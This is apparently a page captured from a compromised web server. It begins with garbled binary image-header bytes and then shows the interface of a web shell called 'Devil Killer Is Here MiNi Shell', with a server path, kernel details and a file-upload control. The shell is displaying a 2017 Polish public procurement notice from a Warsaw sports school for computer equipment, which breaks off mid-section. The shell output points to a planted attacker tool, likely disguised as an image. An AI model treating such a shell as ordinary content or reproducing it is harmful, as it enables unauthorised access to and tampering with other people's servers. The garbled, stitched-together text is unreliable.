JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170518/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170518/511127-N-2017.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 511127-N-2017 z dnia 2017-05-18 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Zespół Szkół Sportowych Nr 50 im. Janusza Kusocińskiego</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Dostawa, wniesienie i montaż wraz z uruchomieniem sprzętu komputerowego/elektronicznego na potrzeby Zespołu Szkół Sportowych nr 50 im.Janusza Kusocińskiego w Warszawie</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Dostawy</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia">0%</span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Zespół Szkół Sportowych Nr 50 im. Janusza Kusocińskiego</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">79331900000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Samuela Bogumiła Lindego</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">20</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">01952 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Warszawa</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">mazowieckie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">22 834 86 58</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">zs50@edu.um.warszawa.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">22 834 86 58</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">http://www.kusy.edu.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Inny (proszę określić):</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny">Jednostka organizacyjna nie posiadająca osobowości prawnej</span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">http://www.kusy.edu.pl</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja"></span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Składanie wniosków o dopuszczenie do udziału w licytacji elektronicznej odbywa się za pośrednictwem operatora pocztowego w rozumieniu ustawy z 23 listopada 2012 r. - Prawo pocztowe (Dz.U. z 2012 r. poz. 1529 oraz z 2015 r. poz.1830) posłańca lub osobiście (wniosek musi być złożony w formie pisemnej)</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Zespół Szkół Sportowych nr 50 im.Janusza Kusocińskiego, ul.Lindego 20, 01-952 Warszawa, Miejsce złożenia wniosku: Główny Sekretariat Szkoły</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Dostawa, wniesienie i montaż wraz z uruchomieniem sprzętu komputerowego/elektronicznego na potrzeby Zespołu Szkół Sportowych nr 50 im.Janusza Kusocińskiego w Warszawie</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">ZSS50.ZP.26.3.2017</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Dostawy</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">1.Przedmiotem zamówienia jest dostawa, wniesienie i montaż, podłączenie do sieci wraz z uruchomieniem fabrycznie nowego, nieużywanego, nieuszkodzonego, wolnego od wad fizycznych i wad prawnych sprzętu komputerowego/elektronicznego na potrzeby Zespołu Szkół Sportowych nr 50 im. Janusza Kusocińskiego w Warszawie. Szczegółowy opis oraz ilość asortymentu określa Opis przedmiotu zamówienia stanowiący załącznik nr 1 do Ogłoszenia oraz wzór umowy zawarty w sekcji IV. - pkt 4) Ogłoszenia, stanowiący równocześnie załącznik nr 2 do Ogłoszenia. 1) W ramach dostawy Wykonawca zobowiązuje się do transportu sprzętu na własne ryzyko do siedziby Zamawiającego przy ul. Lindego 20, 01-952 Warszawa, a następnie do wniesienia sprzętu do budynku Zespołu Szkół Sportowych nr 50 im. Janusza Kusocińskiego oraz jego ustawienia, montażu i podłączenia do sieci w pomieszczeniach wskazanych przez Zamawiającego (budynek bez windy); 2) Wykonawca zobowiązuje się do pierwszego uruchomienia dostarczonego sprzętu. Mając równocześnie na uwadze, iż meble na których mają zostać ustawione komputery (będące przedmiotem odrębnego zamówienia) mają zostać dostarczone Zamawiającemu do 7 lipca 2017 r., w przypadku dostarczenia przedmiotowego sprzętu przed niniejszą datą, Wykonawca zobowiązuje się do umieszczenia i uruchomienia sprzętu w innym terminie (po dostarczeniu Zamawiającemu mebli, będących przedmiotem odrębnego zamówienia), uzgodnionym z Zamawiającym; 3) Dostarczony sprzęt będzie oryginalnie opakowany (opakowania nie mogą być naruszone), opakowania opisane, co do ich zawartości oraz oznakowane symbolem CE, zgodnie z wymogami określonymi w Rozporządzeniu MGPiPS z dnia 21.08.2007 roku w sprawie zasadniczych wymagań sprzętu elektronicznego (Dz.U. z 2007 r. Nr 155, poz.1089); 4) Sprzęt elektroniczny będący przedmiotem niniejszego zamówienia zaopatrzony będzie w instrukcje (jeżeli dany sprzęt taką instrukcję posiada), opisy techniczne i karty gwarancyjne, które będą w języku polskim; 2. Okres w którym realizowane będzie zamówienie: do dnia 14 lipca 2017 r., przy czym terminy planowanej dostawy i uruchomienia sprzętu Wykonawca jest zobowiązany uzgodnić z Zamawiającym.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">30214000-2</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30213100-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30232110-8</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc">0,00</span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2017-07-14 00:00:00</span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow">Zasady przygotowania wniosku o dopuszczenie do udziału wlicytacji elektronicznej: 1) Treść wniosku o dopuszczenie do udziału w licytacji elektronicznej wraz z pozostałymi załącznikami, można pobrać ze strony internetowej Zamawiającego:http://www.kusy.edu.pl - odpowiednio w formacie pdf/word. 2) Wykonawca może złożyćtylko jeden wniosek. Złożenie większej liczby wniosków spowoduje odrzucenie wszystkichzłożonych wniosków złożonych przez danego Wykonawcę. 3) Wniosek oraz wszelkiewymagane dokumenty muszą spełniać następujące wymogi: a) musi zostać sporządzony wjęzyku polskim, z zachowaniem formy pisemnej na maszynie do pisania, komputerze, ręczniedługopisem czytelnym pismem, b) wniosek i wszystkie załączone dokumenty sporządzoneprzez Wykonawcę muszą być podpisane; za podpisanie uznaje się własnoręczny podpis zpieczątką imienną lub czytelnie imię i nazwisko osoby/ób upoważnionej/ych doreprezentowania, zgodnie z formą reprezentacji Wykonawcy, określoną w dokumencierejestrowym lub innym dokumencie, właściwym dla formy organizacyjnej. W przypadku, gdyWykonawcę reprezentuje pełnomocnik, do wniosku musi być dołączone pełnomocnictwo(oryginał lub poświadczona notarialnie kopia) określające jego zakres i podpisane przez osobyuprawnione do reprezentacji Wykonawcy. 4) Dokumenty należy złożyć w formie oryginału lubkopii poświadczonej za zgodność z oryginałem przez Wykonawcę (osobę upoważnioną doreprezentacji Wykonawcy zgodnie z aktualnym dokumentem rejestrowym firmy lub zgodnie zpełnomocnictwem) z wyłączeniem dokumentów, których forma została odmiennie określona wogłoszeniu. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówieniaoraz w przypadku innych podmiotów, na którego zdolnościach lub sytuacji Wykonawca polegana zasadach określonych w art.22a ust.1 ustawy, poświadczenia za zgodność z oryginałemdokonują odpowiednio Wykonawcy wspólnie ubiegający się o udzielenie zamówieniapublicznego albo podmiot, na którego zdolnościach lub sytuacji polega Wykonawca. 5) Osobąstwierdzającą zgodność kopii dokumentu z oryginałem musi być osoba/y upoważniona/e doreprezentowania Wykonawcy zgodnie z aktualnym dokumentem rejestrowym firmy lubzgodnie z pełnomocnictwem. 6) Poprawki lub zmiany (również przy użycia korektora)powinny być parafowane przez osobę/y podpisującą/e wniosek. 7) Dokumenty sporządzone wjęzyku obcym, muszą być składane wraz z ich tłumaczeniem na język polski, poświadczonymprzez Wykonawcę. 8) Wniosek wraz z załącznikami należy złożyć w zamkniętej kopercieopatrzonej co najmniej nazwą przedmiotu zamówienia. 9) Postępowanie o udzieleniezamówienia publicznego prowadzone jest w trybie licytacji elektronicznej na podstawieprzepisów ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz.U. z 2015 r.,poz. 2164 ze zm.), zwanej w ogłoszeniu ustawą. 10) Nr sprawy ZSS50.ZP.26.3.2017- Wykonawcy winni we wszystkich kontaktach z Zamawiającym, powoływać się na wskazanynr sprawy. 11) Osoba do kontaktu: Maria Tabor.</span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający nie określa niniejszego warunku.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający nie określa niniejszego warunku.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Za spełniających warunek udziału w postępowaniu Zamawiającyuzna Wykonawców, którzy wykażą, że w okresie ostatnich trzech lat przed upływemterminu składania wniosków do udziału w postępowaniu, a jeżeli okres prowadzeniadziałalności jest krótszy - w tym okresie wykonali (zrealizowali) - dostawę sprzętu komputerowego (np. komputerów stacjonarnych, przenośnych itp.) na kwotę brutto minimum 50 000,00 zł. Ocena spełniania warunku udziału w postępowaniudokonana zostanie w systemie ,,1" lub ,,0", zgodnie z formułą ,,spełnia-nie spełnia" woparciu o informacje zawarte w oświadczeniu o spełnianiu warunków udziału wpostępowaniu, o którym mowa w sekcji III - pkt 3) Ogłoszenia.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Nie</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Nie</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE 